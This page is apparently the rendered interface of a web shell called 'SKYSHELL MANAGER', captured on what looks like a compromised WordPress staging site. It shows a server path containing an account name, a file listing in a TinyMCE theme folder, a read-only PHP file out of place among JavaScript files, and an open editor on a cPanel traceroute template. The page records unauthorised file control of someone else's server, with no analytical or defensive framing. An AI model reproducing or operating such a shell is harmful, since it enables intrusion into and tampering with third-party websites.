📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: traceroute.html.tt
[% SET CPANEL.CPVAR.dprefix = "../"; %] [% SET traceroute = Api2.exec("Net", "traceroute", {} ); %] [% WRAPPER '_assets/master.html.tt' app_key = 'track_dns' -%] <div class="body-content"> <table class="table table-striped sortable"> [% IF traceroute.size; %] [% FOREACH route IN traceroute; %] <tr> <td>[% route.line.html() %]</td> </tr> [% END %] [% END %] </table> [% INCLUDE _assets/return_link.html.tt return_location='index.html' return_link_text=locale.maketext('Go Back') %] </div> [% END #wrapper -%]
Save